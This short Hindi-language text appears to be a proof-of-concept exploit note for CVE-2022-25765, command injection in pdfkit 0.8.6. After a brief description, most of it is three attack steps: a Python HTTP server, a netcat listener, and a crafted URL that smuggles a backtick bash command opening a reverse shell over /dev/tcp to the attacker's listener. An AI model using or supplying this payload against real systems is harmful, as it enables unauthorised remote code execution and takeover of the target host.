
CVE-2022-25765 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो pdfkit 0.8.6 में अनसैनिटाइज़्ड URL पैरामीटर के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, जिससे रिमोट कोड एक्ज़ीक्यूशन और रिवर्स शेल संभव होता है।
0.0.0 से pdfkit पैकेज कमांड इंजेक्शन के प्रति संवेदनशील है, जहाँ URL को उचित रूप से सैनिटाइज़ नहीं किया जाता।
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}